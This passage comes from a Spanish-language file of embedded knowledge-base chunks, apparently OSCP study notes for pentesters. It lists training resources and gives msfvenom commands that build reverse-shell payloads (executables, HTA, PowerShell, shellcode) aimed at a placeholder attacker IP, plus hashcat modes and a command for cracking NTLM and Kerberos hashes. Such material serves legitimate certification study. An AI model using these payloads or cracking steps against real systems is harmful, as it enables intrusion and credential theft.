Null's OSCP-like list** (en Reddit) | Lista actualizada de máquinas HTB/THM equivalentes a OSCP |\n| **ippsec.rocks** | Buscador de writeups por técnica (\"kerberoasting\" → te lista todas las máquinas HTB donde aparece) |\n| **0xdf.gitlab.io** | Writeups detalladísimos con explicación pedagógica |\n| **PayloadsAllTheThings** | Cheatsheet de todo lo web |\n| **HackTricks (book.hacktricks.xyz)** | La biblia. Lo busques lo que busques está ahí |\n| **GTFOBins / LOLBAS** | Para privesc Linux y LOLBins Windows |\n| **/r/oscp** | Subreddit con experiencias de examinados (sin spoilers) |\n| **Discord públicos**: HTB, TryHackMe, NetSecFocus | Comunidades activas que SÍ puedes consultar |\n\n---", "v": [-0.08534, -0.1008, -0.01051, 0.04089, 0.15762, -0.35895, -0.12152, 0.05675, 0.04205, 0.07022, -0.09104, -0.1222, 0.10174, 0.03939, 0.04384, -0.04805, -0.07489, -0.07109, 0.04215, -0.06531, -0.00664, 0.06543, -0.29269, -0.02809, 0.15112, -0.01886, -0.01967, -0.03025, -0.25075, -0.0061, -0.05234, -0.06968, -0.11919, 0.01896, -0.186, 0.01005, 0.02243, 0.0039, 0.02617, 0.2101, -0.00912, 0.11614, -0.05793, 0.14131, 0.04941, -0.15111, 0.0996, 0.012, -0.01505, -0.12426, 0.00324, -0.02968, -0.11454, -0.00583, -0.01585, -0.03348, 0.06109, 0.02031, -0.05586, 0.03464, -0.02926, 0.04598, -0.07011, -0.10926, 0.06652, 0.01525, 0.07101, -0.06933, -0.01379, 0.09394, -0.0654, -0.00165, -0.00486, -0.10599, 0.03511, -0.0386, 0.09496, -0.06421, 0.06996, 0.02544, -0.06577, -0.05718, 0.013, 0.03741, -0.04241, -0.03838, 0.07645, -0.00787, 0.03331, -0.10436, 0.04384, 0.02679, 0.01259, 0.05833, -0.00238, -0.12974, 0.06378, 0.03566, -0.00164, -0.02607, -0.00485, 0.02913, -0.04805, 0.07216, -0.0432, 0.03433, 0.06631, -0.01146, 0.0134, -0.01016, 0.16191, 0.02454, 0.05676, 0.03399, 0.00181, -0.01116, -0.06931, 0.057, 0.04879, -0.02884, -0.00093, 0.03596, -0.02877, -0.03664, 0.0603, -0.00016, 0.03051, 0.06267, -0.04921, -0.00866, 0.05447, -0.00328, -0.03396, -0.02278, -0.07589, -0.00119, 0.04689, -0.01916, 0.03338, -0.0287, 0.03789, 0.0381, 0.03986, 0.05404, 0.03535, 0.01835, 0.06028, -0.05897, -0.02227, 0.01155, 0.04434, 0.03545, 0.00062, 0.03008, -0.00346, -0.07025, 0.06705, -0.01222, -0.09516, -0.01876, 0.00917, 0.03671, -0.01134, 0.01718, -0.09294, 0.02059, 0.02288, -0.00742, -0.00637, -0.0424, -0.01653, 0.0067, -0.00156, -0.02547, 0.03471, -0.05833, 0.07389, -0.02284, -0.01045, -0.04389, 0.02883, -0.01105, 0.03906, -0.00795, -0.03874, -0.02643, 0.02955, -0.04733, 0.00972, 0.00852, -0.00935, 0.01034, 0.052, 0.00398, 0.01775, 0.02301, -0.00392, -0.03342, -0.01569, -0.03238, -0.03606, -0.01149, -0.02969, -0.02969, -0.00744, -0.00269, 0.01131, -0.00102, -0.02599, -0.01978, 0.0519, -0.01647, 0.00978, -0.06091, -0.03832, 0.01058, -0.01753, 0.02618, 0.00293, -0.01072, -0.0447, 0.03805, 0.03765, 0.00297, -0.00211, 0.00717, 0.00153, -0.03068, 0.03086, -0.01818, 0.01977, -0.00215, 0.05297, -0.02753, -0.02029, 0.01569, -0.01387, -0.01702, -0.02549, -0.03317, -0.05396, 0.00686, -0.01808, -0.03828, -0.04593, -0.05407, -0.00966, -0.01395, -0.01063, -0.00966, -0.02009, -0.01505, -0.04285, -0.06347, -0.02409, 0.00197]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Truco meta de meta-trucos\n\nEl truco real del OSCP no es saber 200 técnicas. Es **tener una metodología repetible**:\n\n```\nEnumeración exhaustiva → vector → foothold →\nPrivEsc con script automatizado + revisión manual →\ndocumentar antes de pasar a siguiente máquina\n```\n\nLa gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento técnico.", "v": [-0.03076, -0.11271, -0.26096, -0.12873, 0.02676, -0.11772, -0.02737, -0.06551, 0.05718, 0.00637, -0.1811, -0.00061, 0.09488, 0.03125, 0.10381, 0.00112, 0.13278, -0.07489, 0.1852, 0.01798, 0.00021, -0.10951, -0.08532, -0.01484, 0.12373, -0.02533, -0.12206, 0.00756, -0.15332, -0.09538, -0.02927, 0.18287, -0.0095, -0.10112, -0.05035, -0.02841, 0.07984, -0.05844, -0.00251, 0.15541, -0.04509, 0.01097, -0.07488, 0.0962, 0.10371, -0.14426, 0.08162, 0.06643, -0.01632, 0.03666, 0.02369, 0.05165, -0.07368, 0.01116, -0.05803, -0.09514, 0.15816, 0.00891, 0.00564, -0.04308, 0.09066, -0.01117, -0.00461, 0.02591, 0.04627, 0.00184, 0.12773, -0.12214, -0.10368, 0.06051, -0.00028, 0.0547, -0.07069, -0.03757, 0.08249, -0.01933, 0.05975, -0.00101, 0.15026, -0.00193, -0.11224, -0.07267, -0.00422, 0.0216, -0.08785, -0.04925, 0.08696, -0.0623, -0.02423, -0.11885, 0.06967, 0.04636, 0.01893, -0.06772, 0.07214, -0.01564, 0.09404, 0.02684, -0.02288, 0.08262, 0.05287, 0.03422, -0.07635, 0.07058, 0.03655, 0.06857, 0.08331, -0.02103, -0.06292, -0.05623, -0.01615, 0.07712, -0.07542, 0.03334, -0.09545, -0.02059, -0.04865, -0.00184, -0.03316, 0.01712, -0.04986, 0.02889, -0.0268, -0.0512, -0.03731, -0.0581, -0.0057, 0.11779, 0.04311, 0.03075, 0.01096, 0.0098, -0.06467, -0.03612, -0.03099, 0.00678, 0.02905, 0.01487, -0.04473, -0.12637, 0.01941, 0.02944, -0.01979, 0.00165, 0.05523, -0.07428, 0.03545, -0.07986, -0.0414, 0.01724, 0.01464, 0.03636, 0.07941, 0.03621, 0.04516, -0.056, 0.06434, -0.05985, -0.05472, 0.07591, 0.02899, 0.01919, -0.00542, -0.05032, -0.01632, 0.04921, 0.01189, -0.03778, -0.05239, 0.01111, 0.0236, -0.03475, -0.03042, -0.0134, 0.03282, -0.01706, -0.00406, -0.04303, -0.01422, 0.0006, 0.02477, 0.01716, 0.07945, 0.02272, 0.05425, -0.0323, -0.01541, -0.00576, 0.04772, 0.08571, 0.01494, -0.02315, -0.05308, -0.0254, -0.00325, -0.01473, 0.01956, -0.01533, 0.05669, 0.01441, -0.04618, -0.01434, -0.04708, -0.00079, 0.01015, -0.00031, -0.01524, -0.06262, -0.08472, 0.03043, 0.04215, -0.04032, 0.04001, -0.0206, 0.02315, -0.04072, -0.03556, 0.01285, -0.04733, -0.00268, 0.04218, 0.01939, 0.04508, 0.04611, -0.01203, 0.01807, 0.06452, 0.02349, 0.02874, 0.02108, -0.11124, -0.00708, 0.04897, -0.03033, 0.00312, 0.04141, 0.02932, -0.0262, -0.02233, -0.07469, 0.02191, 0.03172, 0.0014, -0.04101, -0.0449, -0.06155, -0.03092, -0.03155, 0.0745, -0.01226, 0.02211, -0.02994, -0.05547, -0.04537, 0.01034, -0.04064]} +{"tipo": "metodologia", "herramienta": "msfvenom", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "texto": "# msfvenom\n\n> El generador de payloads. Lo usas en Buffer Overflow, AV evasion, Client-side attacks, Exploits conocidos y con el handler de Metasploit.", "v": [0.20032, -0.14986, -0.09842, -0.07629, -0.13285, 0.10269, -0.0631, -0.06827, -0.12862, 0.0485, -0.14766, -0.09832, -0.05778, 0.15975, 0.03464, 0.02209, 0.02162, -0.09049, -0.10329, -0.04673, -0.039, 0.1238, -0.05711, -0.06817, 0.074, 0.2075, -0.14362, 0.06286, -0.08302, -0.00108, 0.05813, 0.06294, -0.01578, -0.01693, 0.05672, -0.07077, 0.03599, 0.06512, 0.05646, 0.23047, 0.07083, 0.01189, -0.14065, -0.0425, 0.16527, -0.15277, -0.08271, -0.03373, 0.03728, 0.02789, -0.00474, 0.01273, -0.13041, 0.07714, -0.09494, -0.06861, 0.06486, -0.07405, -0.0248, 0.12912, 0.0135, 0.01235, -0.0324, -0.05331, -0.06814, -0.11013, -0.01892, -0.0238, -0.02579, -0.01645, -0.01955, 0.0472, 0.03423, 0.01597, 0.09118, -0.0801, 0.00695, 0.03203, 0.12056, 0.11007, -0.04898, 0.01857, -0.1082, -0.03587, -0.0809, -0.01053, 0.00274, -0.06111, 0.00584, 0.02766, 0.00232, 0.01377, -0.03315, 0.03227, -0.05249, -0.00491, 0.06083, -0.01992, -0.02408, 0.02472, 0.06216, 0.03642, -0.03509, 0.03646, 0.06179, 0.02704, 0.04862, -0.05228, 0.00877, -0.03211, 0.10395, -0.05338, 0.08288, -0.03243, -0.02034, 0.01145, 0.01934, -0.0189, 0.04501, 0.0555, -0.0509, -0.03666, 0.02307, -0.0194, -0.02556, -0.08349, -0.07529, 0.03877, -0.00452, -0.01173, 0.0224, 0.00436, -0.04617, 0.06027, 0.04648, -0.07469, 0.08224, 0.03589, 0.01354, 0.00856, 0.01997, 0.03135, 0.02759, 0.10479, 0.04089, -0.00097, 0.04501, -0.05698, 0.03841, -0.01322, 0.00656, 0.0139, 0.02815, -0.0742, -0.00823, -0.07657, 0.01505, 0.0043, -0.0136, 0.07679, 0.0379, 0.0778, -0.00953, 0.00525, -0.05127, -0.02036, -0.01726, -0.02979, -0.03789, 0.05633, 0.00348, -0.01039, 0.07466, -0.08007, -0.03429, -0.04606, -0.08788, -0.1351, -0.01465, 0.04038, -0.14556, -0.0194, 0.03486, 0.06805, 0.00193, -0.07888, 0.07938, 0.01263, 0.06141, 0.02872, 0.01897, -0.0002, -0.05968, -0.03229, -0.03796, -0.00797, -0.00877, -0.02478, 0.07439, 0.0165, 0.06433, 0.01531, 0.0236, -0.08232, 0.02951, 0.10002, -0.04494, 0.03081, -0.043, -0.04404, 0.08747, -0.04053, 0.10476, -0.03245, -0.04364, -0.02729, -0.02831, -0.00685, 0.03126, 0.01846, -0.02476, 0.04316, 0.04062, 0.01362, -0.03465, 0.02741, 0.01544, -0.04975, 0.00674, 0.00881, -0.02215, 0.03015, -0.03323, -0.0559, 0.03762, 0.0048, 0.02419, -0.02688, -0.0782, 0.00918, 0.00484, -0.01853, 0.01018, -0.07491, -0.03851, -0.0196, -0.00219, -0.0217, -0.0311, 0.00971, -0.04504, 0.01241, -0.03076, -0.03477, 0.04973, -0.00202]} +{"tipo": "metodologia", "herramienta": "msfvenom", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "texto": "## Anatomía\n```bash\nmsfvenom -p LHOST=TU_IP LPORT=443 -f -o salida [-b badchars] [-e encoder]\n```", "v": [0.00627, -0.08587, -0.02287, 0.0414, -0.01922, -0.131, 0.01053, -0.11856, -0.08875, 0.16893, -0.07137, 0.02197, 0.02877, 0.0861, -0.09406, -0.00731, -0.07576, -0.07956, -0.04045, -0.04026, 0.04373, 0.13891, -0.18538, 0.02378, 0.09999, 0.17334, -0.13522, -0.00023, -0.19114, -0.08565, 0.02498, -0.06615, -0.04109, 0.08501, -0.05815, -0.02204, 0.07424, 0.04349, -0.07283, 0.35176, -0.00442, 0.09362, -0.04862, 0.07892, 0.13248, -0.12544, 0.00416, 0.10825, 0.06031, -0.13739, 0.0061, 0.02311, 0.02373, 0.08697, -0.00631, -0.03585, 0.11445, -0.07995, -0.12541, 0.07566, 0.06175, 0.02621, -0.0795, -0.09111, 0.00575, 0.00919, 0.07827, -0.01677, -0.04597, -0.06903, -0.02101, -0.03064, -0.06364, 0.01545, 0.04398, 0.02568, -0.03551, 0.01413, 0.11654, 0.1103, -0.01099, -0.03794, -0.02161, -0.02887, -0.02088, -0.01469, 0.0764, -0.09071, 0.00774, -0.0913, 0.04453, -0.01457, -0.01435, 0.0453, -0.03332, -0.09092, 0.00482, -0.00885, -0.00772, -0.02013, 0.02412, 0.13691, -0.01332, 0.01597, 0.1289, 0.03675, 0.0407, -0.00732, -0.00971, 0.08954, 0.0591, -0.03812, 0.07135, -0.08362, -0.09194, -0.03904, -0.05056, 0.03986, 0.06493, 0.01626, 0.0535, -0.06037, -0.01391, 0.06963, -0.00191, -0.05931, -0.0517, 0.0343, -0.01709, -0.02647, 0.00949, 0.01579, -0.02309, 0.02008, 0.02585, -0.03294, 0.04121, 0.01031, 0.01581, 0.02357, 0.05423, 0.05294, -0.01449, 0.04806, 0.06312, -0.00915, 0.05703, -0.09501, -0.09426, 0.0156, 0.0698, 0.1076, -0.0184, -0.04331, 0.01191, -0.01753, 0.11318, -0.06473, -0.07393, -0.00799, -0.01774, 0.08483, 0.01506, -0.01227, -0.02002, -0.03987, -0.00055, -0.04404, 0.00517, -0.00022, 0.00963, 0.00694, 0.01501, -0.04093, -0.00378, -0.02985, -0.03134, -0.04165, -0.00948, 0.0089, -0.03726, 0.02849, -0.01065, 0.07963, -0.00266, -0.01764, -0.0066, 0.00125, 0.01207, -0.05064, 0.04544, 0.08344, -0.00907, -0.02628, -0.00116, 0.00321, -0.0437, -0.02877, 0.02557, -0.03071, 0.00295, 0.00018, 0.038, 0.00275, 0.02268, -0.02548, 0.00217, 0.04535, 0.02774, -0.02879, 0.0177, -0.03717, 0.03148, -0.03024, -0.0736, 0.0426, 0.01829, 0.04424, 0.04557, -0.01367, -0.02781, 0.07452, 0.06862, 0.02455, -0.00518, 0.03989, 0.08536, 0.03491, -0.00317, -0.02147, 2e-05, 0.07379, -0.01376, -0.05135, 0.00578, 0.00143, -0.06788, -0.00227, -0.05389, -0.05147, 0.00677, -0.0384, -0.05453, -0.08751, -0.01512, -0.04451, -0.04605, 0.04914, 0.01262, 0.03439, -0.08048, 0.02147, -0.06759, -0.07178, 0.01848, -0.01077]} +{"tipo": "metodologia", "herramienta": "msfvenom", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "texto": "## Payloads frecuentes\n```\nwindows/shell_reverse_tcp shell normal (no necesita Metasploit para recibir → nc)\nwindows/meterpreter/reverse_tcp meterpreter (recíbelo con multi/handler)\nlinux/x86/shell_reverse_tcp\nwindows/x64/shell_reverse_tcp (x64)\n```", "v": [0.11323, -0.11691, -0.09634, -0.12687, 0.03807, -0.1033, -0.09959, -0.00254, 0.10027, 0.07296, -0.10676, -0.0169, 0.05792, -0.04521, -0.02029, -0.02149, -0.18359, -0.13157, 0.19517, -0.08399, -0.0591, 0.00707, -0.13085, -0.15853, 0.02558, 0.15133, 0.0105, 0.03281, -0.08021, -0.06376, -0.02957, -0.17339, 0.02251, 0.02259, -0.07053, 0.09497, -0.00759, 0.02434, 0.03953, 0.142, 0.03037, 0.04729, -0.1214, 0.10333, 0.18028, -0.10529, 0.0661, -0.09147, 0.02941, -0.16019, -0.1291, -0.06422, -0.18982, 0.02059, 0.00256, 0.01548, 0.14987, 0.02603, 0.03416, -0.05782, -0.07066, 0.11504, -0.05213, -0.04727, 0.08158, -0.03511, -0.00681, -0.07337, -0.11705, 0.04013, -0.0864, 0.06999, -0.03196, 0.03285, 0.04621, -0.01262, -0.04187, -0.02763, 0.14464, 0.02869, -0.05227, 0.02275, -0.01171, -0.06848, -0.04075, -0.12644, 0.01963, -0.01877, 0.05834, 0.00987, 0.0545, 0.00677, -0.05631, 0.07997, 0.06756, -0.15726, -0.10541, 0.06264, -0.09454, 0.0078, -0.00948, 0.04438, -0.01778, 0.09402, 0.02093, 0.01453, -0.03109, -0.0243, -0.05132, 0.03504, 0.01914, 0.03693, 0.0719, 0.01255, -0.01898, -0.08367, -0.05963, -0.03481, 0.08805, 0.05376, -0.04267, -0.01952, -0.02258, 0.05001, -0.03115, -0.01768, 0.03094, 0.10014, -0.07222, 0.01911, -0.00158, 0.006, 0.00257, -0.00986, -0.10174, 0.12009, 0.04558, -0.04873, -0.01209, -0.0331, 0.01371, 0.09597, 0.00912, 0.04407, 0.0503, 0.01149, 0.04428, -0.03315, -0.07914, -0.00517, 0.08662, 0.09532, -0.03376, 0.0134, -0.02385, -0.08147, 0.0393, 0.00232, -0.00157, 0.00451, -0.01733, -0.0131, -0.01638, 0.01892, -0.01664, 0.03455, -0.05738, 0.06645, 0.03174, -0.03125, -0.00895, 0.05354, 0.05629, -0.04772, -0.02857, -0.03463, 0.02381, -0.06579, 0.03059, -0.02149, -0.00628, -0.00711, 0.06694, -0.0256, -0.00952, 0.02043, 0.01365, 0.02206, 0.0042, -0.04091, 0.034, -0.00773, -0.05041, -0.05199, 0.0113, 0.0122, 0.00582, -0.09298, 0.01769, 0.06015, -0.03495, 0.03507, 0.04753, -0.0497, 0.01635, -0.02089, -0.01914, 0.00433, 0.01203, -0.00613, 0.00234, 0.00537, 0.00034, 0.08093, -0.0017, -0.01203, 0.04499, 0.02321, 0.0026, 0.01379, -0.0341, -0.01747, -0.04604, 0.05152, 0.01714, -0.06376, 0.00388, -0.01865, 0.00336, -0.03527, -0.04057, 0.03117, 0.01467, -0.00364, 0.00859, -0.02915, -0.05998, -0.06041, 0.01608, -0.02875, 0.02208, 0.02505, -0.03725, -0.03374, 0.0027, -0.00712, -0.00959, -0.00634, 0.00589, 0.0157, -0.02653, 0.00561, -0.03033, -0.03637, -0.07163, -0.0131]} +{"tipo": "metodologia", "herramienta": "msfvenom", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "texto": "## Formatos (-f) según el caso\n```\nexe ejecutable Windows dll DLL hijacking / Exploits conocidos\nraw shellcode crudo (B0F) py para tu script de Buffer Overflow\npsh / powershell hta-psh Client-side attacks\naspx / war / jsp webshells para upload\nelf ejecutable Linux\n```", "v": [-0.06429, -0.12644, -0.14562, -0.08342, 0.0532, -0.15953, -0.00409, -0.11131, -0.01391, 0.02725, -0.04275, -0.02867, -0.0403, -0.08699, -0.01662, -0.18497, -0.08944, -0.08298, -0.07212, -0.11376, -0.10143, 0.06815, -0.18657, -0.03296, -0.08042, 0.10177, -0.11137, 0.1457, -0.13775, -0.09196, 0.05958, -0.03474, 0.0191, -0.06173, 0.05762, 0.11797, -0.02598, 0.04503, -0.00359, 0.21704, 0.0173, 0.04642, -0.13332, 0.10437, 0.01371, -0.04571, 0.05043, -0.02553, 0.07856, -0.05621, 0.01326, 0.00075, -0.23223, 0.0311, 0.05541, -0.09577, 0.13545, -0.17564, 0.058, 0.08942, -0.09724, 0.00604, 0.00843, -0.04819, 0.03598, -0.00641, 0.05409, -0.05832, -0.02919, 0.05396, -0.11378, 0.05677, 0.00019, -0.00631, 0.04794, -0.04282, -0.07661, -0.00058, 0.16227, 0.02423, -0.06201, -0.07216, -0.08281, 0.00569, -0.10258, -0.08811, -0.03138, -0.08348, -0.01399, -0.01946, 0.11826, -0.0322, -0.0078, 0.10395, 0.05489, -0.08953, 0.03253, -0.0069, 0.02063, -0.00128, -0.05734, -0.03986, -0.06112, 0.112, 0.0448, 0.06295, -0.04887, 0.01322, -0.00186, 0.00758, 0.06135, -0.00468, 0.01845, -0.03609, -0.03559, -0.04811, -0.08666, -0.10259, 0.04195, -0.02528, -0.079, -0.01214, -0.04783, 0.08577, -0.06106, -0.03681, -0.02966, 0.07366, -0.06921, -0.03029, 0.00864, -0.02593, 0.00961, 0.01905, -0.0205, 0.07016, 0.0595, 0.00076, 0.02246, -0.07988, 0.08594, 0.06162, 0.01745, 0.09654, 0.09072, -0.03424, 0.02513, -0.04528, 0.00334, 0.0293, 0.10777, -0.00956, -0.00824, 0.01769, -0.02869, -0.08417, -0.00126, 0.07186, -0.01063, 0.01249, 0.0221, 0.03075, -0.00273, 0.0705, 0.00127, -0.00111, -0.03189, -0.02213, 0.03995, -0.02668, 0.00872, 0.06501, 0.00069, -0.08453, 0.01549, -0.07385, 0.00593, -0.08111, 0.02444, -0.01854, -0.02832, -0.01554, 0.00802, 0.05532, -0.03504, -0.00928, 0.07423, -0.01211, -0.05976, -0.00269, -0.02172, 0.03348, -0.03487, -0.05297, -0.00277, 0.01942, -0.02911, -0.04066, 0.01342, -0.00101, -0.0668, 0.02628, -0.0176, -0.07288, 0.05271, 0.03038, -0.04722, 0.05993, -0.04509, 0.01792, 0.0468, -0.01108, 0.0392, 0.00989, -0.00885, -0.0226, 0.02297, -0.00811, 0.04714, 0.01137, -0.04041, 0.02604, 0.0667, -0.03113, 0.00127, -0.04902, 0.0041, -0.02056, -0.01825, 0.01051, -0.00734, 0.04386, -0.0096, -0.03657, 0.00029, 0.00951, 0.02415, 0.00782, -0.02092, -0.01946, 0.03154, 0.04525, -0.00679, -0.06549, -0.04865, -0.06068, -0.0407, 0.0267, 0.00941, -0.01501, -0.03542, -0.01599, -0.00728, -0.02482, -0.05782, 0.00645]} +{"tipo": "metodologia", "herramienta": "msfvenom", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "texto": "## Ejemplos\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f exe -o rev.exe\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\" -f py\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # → AV evasion\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta\n```\n- Encoders (`-e x86/shikata_ga_nai`) ofuscan, **no** evaden AV moderno por sí solos → ver AV evasion.\n\nRelacionado: Reverse shell · Metasploit · OSCP MOC", "v": [0.02685, -0.26195, -0.1331, 0.00308, 0.05108, -0.12397, -0.04524, -0.1536, 0.02398, 0.15246, -0.08466, -0.01032, 0.04925, 0.03517, 0.03168, -0.00814, -0.02988, -0.12423, 0.01713, -0.10451, -0.05733, 0.09431, -0.18126, -0.05005, 0.09612, 0.21127, -0.11963, 0.05438, -0.10658, -0.17082, 0.02078, -0.09367, -0.04584, 0.03674, -0.03462, 0.00602, 0.06029, 0.02323, 0.09249, 0.25954, 0.1094, 0.09171, -0.10528, 0.09994, 0.1847, -0.1762, 0.03008, -0.02126, 0.01742, -0.05832, -0.11833, -0.10076, -0.12388, 0.0353, -0.00709, 0.02328, 0.11417, -0.0225, 0.0265, -0.03146, -0.01046, 0.09649, -0.10152, -0.12403, 0.03975, -0.00612, 0.04408, -0.07894, -0.08457, -0.00105, -0.03818, 0.02924, -0.01517, -0.031, 0.03414, -0.073, 0.01281, -0.04833, 0.09616, 0.04455, -0.06183, -0.00926, -0.05377, -0.06445, -0.07921, -0.08738, 0.05135, -0.04077, 0.02624, -0.04529, 0.04676, 0.01834, -0.05739, 0.06705, 0.0586, -0.13173, -0.03305, 0.02371, -0.02888, 0.04175, 0.00125, 0.07394, -0.05168, 0.07937, 0.01558, -0.02478, 0.01332, 0.00969, -0.01778, 0.0788, 0.03791, -0.02098, 0.0055, -0.07582, -0.00917, -0.07176, -0.06352, -0.0298, 0.07012, 0.02126, -0.04529, -0.07402, -0.02059, 0.08015, -0.05714, -0.05648, 0.01958, 0.11214, -0.03467, 0.02583, 0.03721, -0.06498, -0.00996, -0.01614, -0.01631, 0.07519, 0.01259, 0.01597, 0.01608, -0.05955, 0.08286, 0.06296, 0.00516, 0.04023, 0.05644, -0.01474, 0.05231, -0.04572, -0.01978, 0.00583, 0.10088, 0.02332, 0.00377, -0.01177, -0.00142, 0.0138, 0.06378, 0.01386, -0.01485, 0.02661, -0.0048, 0.04006, -0.00393, 0.03125, 0.01425, -0.02775, -0.02122, 0.05442, 0.05431, -0.02219, -0.02634, 0.01506, 0.01625, -0.03372, -0.0238, -0.05543, 0.01816, -0.05167, -0.01624, 0.002, 0.00921, -0.04536, 0.0567, -0.01643, -0.01949, -0.00026, 0.01895, 0.01778, 0.00098, -0.03882, 0.01693, 0.01391, -0.05971, -0.01405, -0.01463, -0.00239, -0.01005, -0.10074, 0.03117, -0.03165, -0.04781, 0.02474, 0.06753, -0.05052, 0.03079, -0.01598, -0.02066, 0.03439, 0.00287, -0.02962, 0.0214, -0.00552, 0.00902, 0.02411, -0.01697, -6e-05, 0.05295, 0.02531, 0.01745, 0.02333, -0.02901, 0.01713, 0.01486, 0.04777, 0.01819, -0.01197, 0.00768, -0.0178, 0.02173, -0.03375, -0.02271, 0.03295, -0.0086, -0.04335, 0.022, -0.01012, -0.04164, -0.03919, -0.0158, -0.02837, -0.01239, -0.00026, -0.02279, -0.08517, -0.03053, -0.04001, -0.03419, 0.03462, 0.01957, 0.02157, -0.05468, -0.03148, -0.07571, -0.05563, -0.04456, 0.00636]} +{"tipo": "metodologia", "herramienta": "Cracking de contraseñas", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseñas.md", "texto": "# Cracking de contraseñas\n\n> Generar wordlists y romper hashes/credenciales offline y online. Fuente: oscp.trastero.org/passwords.", "v": [0.14487, -0.15601, -0.02804, -0.19383, 0.00871, -0.15695, 0.04842, -0.03921, 0.02692, -0.00407, -0.07638, -0.03423, 0.04579, -0.04559, 0.10433, -0.00896, 0.04742, 0.06429, 0.03699, 0.05825, -0.13857, -0.02987, -0.06287, -0.04476, 0.05866, -0.13556, -0.10596, 0.01382, -0.08888, -0.02515, -0.05864, -0.06422, -0.00156, 0.06113, -0.08817, 0.12051, -0.08205, 0.0767, 0.0542, 0.09263, 0.05619, 0.13517, -0.08827, 0.19361, 0.03865, -0.03941, -0.04686, 0.08186, 0.08613, -0.00572, -0.09012, -0.17124, -0.15224, -0.04451, -0.04863, -0.0794, 0.0977, -0.01601, -0.02336, -0.00544, -0.13711, 0.1303, -0.01894, -0.05548, -0.08919, -0.04935, 0.03122, -0.00364, -0.14782, 0.14301, 0.00404, 0.0535, 0.01359, 0.01717, 0.02253, -0.05497, 0.11274, -0.06133, 0.06825, 0.13858, -0.04361, -0.05514, 0.09804, -0.01811, -0.09397, 0.00947, 0.00032, 0.00625, 0.03512, 0.02968, 0.0593, 0.08543, -0.01516, -0.02361, -0.01125, -0.12243, -0.02814, -0.02177, -0.02079, -0.04042, -0.14463, 0.05458, -0.01375, 0.04327, -0.08297, 0.01078, -0.03212, 0.06531, 0.07434, -0.02334, 0.11718, 0.01392, 0.0187, 0.0194, 0.0301, 0.02961, 0.00154, -0.03705, 0.02053, 0.04173, 0.03464, -0.03784, 0.05394, 0.04354, 0.00669, 0.10613, -0.02258, -0.00013, -0.08981, -0.13022, 0.02019, -0.03545, -0.05841, -0.02894, -0.00062, 0.01134, 0.02658, -0.0783, -0.01981, -0.01885, -0.03608, -0.03042, -0.06739, 0.03108, 0.09645, 0.02158, 0.04504, -0.01826, -0.06105, -0.00685, 0.00322, 0.05309, -0.00223, -0.0542, -0.01231, 0.01772, -0.08808, -0.07467, -0.09941, 0.07037, -0.00133, -0.00992, 0.00616, -0.0282, -0.13781, -0.03787, 0.04587, 0.05791, -0.02169, 0.00792, 0.03543, 0.04421, 0.03697, -0.08792, -0.00206, 0.00491, 0.03129, -0.05181, -0.02223, -0.07097, 0.00815, -0.06968, -0.0096, 0.00108, -0.01558, -0.01273, 0.09423, 0.00137, -0.04606, -0.01296, 0.0144, -0.05482, -0.10772, 0.1297, 0.07586, 0.02427, 0.03413, 0.0439, 0.00497, -0.06179, -0.03461, -0.04923, 0.01881, -0.01878, -0.01863, -0.00403, 0.01197, -0.08829, -0.05456, -0.01573, 0.02188, -0.0187, -0.00425, -0.05576, -0.07461, -0.01092, -0.04806, 0.01821, -0.04299, -0.04282, -0.00885, 0.02047, -0.00106, 0.06011, 0.0115, -0.00771, -0.01833, 0.00736, 0.0149, -0.01295, 0.04405, -0.03081, 0.00839, -0.0327, 0.03954, -0.05643, -0.0592, 0.0085, -0.04147, 0.01356, -0.04782, -0.02175, 0.05086, -0.02863, -0.03881, -0.0118, -0.04174, -0.01588, -0.0313, 0.05341, -0.08189, -0.01054, -0.03291, 0.02815, -0.00702, -0.01018]} +{"tipo": "metodologia", "herramienta": "Cracking de contraseñas", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseñas.md", "texto": "## hashcat — los modos que importan\n```\n-m 0 MD5 -m 100 SHA1 -m 1000 NTLM\n-m 1800 sha512crypt ($6$, /etc/shadow)\n-m 5600 NetNTLMv2 (capturado con Responder → Client-side attacks)\n-m 13100 Kerberoast TGS ($krb5tgs$) → Kerberoasting\n-m 18200 AS-REP ($krb5asrep$) → AS-REP Roasting\n-m 22000 WPA-PBKDF2 -m 13400 KeePass\n```\n```bash\nhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule\n```", "v": [-0.05458, -0.22971, 0.05763, -0.02629, 0.00107, -0.13448, -0.11397, 0.18594, -0.04634, 0.14067, -0.1053, -0.08055, 0.12783, -0.09704, 0.09084, -0.00728, -0.23011, 0.02409, 0.01024, 0.09366, 0.10711, -0.04235, -0.07824, -0.01896, 0.07516, 0.09633, -0.05857, 0.00912, -0.18176, 0.08079, 0.09697, 0.0101, -0.16693, 0.07339, -0.01714, -0.00418, -0.06067, 0.12866, 0.06029, 0.16146, 0.07155, 0.04153, -0.03147, 0.10035, 0.12243, -0.15726, 0.00859, 0.02301, -0.01775, -0.04783, -0.02254, -0.0088, -0.13046, -0.01701, -0.04314, -0.01266, 0.13358, -0.00995, -0.1461, -0.00049, 0.03278, 0.01903, -0.05746, -0.13546, -0.01286, -0.05151, 0.02553, -0.05771, -0.01718, 0.00106, -0.09917, 0.08871, 